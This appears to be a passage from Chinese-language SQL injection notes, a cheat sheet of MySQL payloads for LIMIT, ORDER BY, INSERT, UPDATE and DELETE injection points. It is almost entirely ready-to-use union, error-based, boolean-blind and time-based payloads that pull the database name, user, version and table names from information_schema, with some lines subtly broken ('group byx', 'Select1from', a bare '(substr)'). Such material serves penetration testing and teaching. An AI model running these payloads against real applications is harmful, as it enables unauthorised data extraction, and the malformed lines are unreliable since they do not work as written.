5、其他位置的注入

limit注入

limit 注入，这个词是受注入位置 划分的。
where id=xx  后面的， 也可以叫做 where注入。

limit union注入

没有order by 的情况
SQL: select * from users where id <= 100 limit 1 union select 1,2,3 -- ,1


?p=1 union select 1,2,3 --+

?p=1 union select 1,(SELECT table_name from information_schema.TABLES WHERE table_schema=DATABASE() LIMIT 2,1),3 --+

查列数的方法：
?p=1 into @,@,@ --+

limit union 延时注入

没有order by的情况
if(substr(database() from 1 for 1)=0x73,sleep(5),0)

?p=1 union select 1,if(substr(database() from 1 for 1)='s',sleep(5),0),3--+

order by limit报错注入

mysql<5.6.6 的5.x系列版本
SQL: SELECT * FROM users WHERE id<10 order by id LIMIT 1,1

procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);

?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1) --+

order by limit 报错延时注入

PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(50000000,SHA1(1)),1))))),1);#

?id=1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(50000000,SHA1(1)),1))))),1);--+

order by 注入

SQL：select * from users where id <= 100 order by 1

报错注入

select * from users where id<=100 order by 1,updatexml(1,concat(0x7e,(select user()),0x7e),1);

order by的 case布尔盲注入

select * from users where id<=100 order by 1 rlike (case substr(database(),1,1) when 's' then 1 else 0x28 end)--+

order by的 if布尔注入

select * from users where id<=100 order by if((1=2),1,(select id from information_schema.tables));

insert 注入

常规注入（有回显）
222",(select schema_name from information_schema.schemata limit 1,1))--+

报错注入
222",(Select 1 from (Select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group byx)x))--

if延时注入
222",(if(substr(DATABASE()from 1 for 1)='m',SLEEP(5),1)));--+

update 注入

报错注入
update users set password='aaaxxxxb' where username='222' And (Select1from(Select
count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)x);--+

布尔注入
update users set password='ab'where username='ad2' And (if(1=2,1,0));--+

布尔延时
update users set password='xx' where username='ad2' And 1-(if((substr(database(),1,1)='s'),sleep(5),1));--+

delete 注入

报错注入

delete from users where username="ad2" And ((Select 1 from (Select
count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group
by x)x));-- a

布尔注入

delete from users where username="ad2" And (if((substr),0,1));-- a

布尔延时注入
delete from users where username="ad2" And 1-(if((substr(version(),1,1)='5'),sleep(5),1));-- a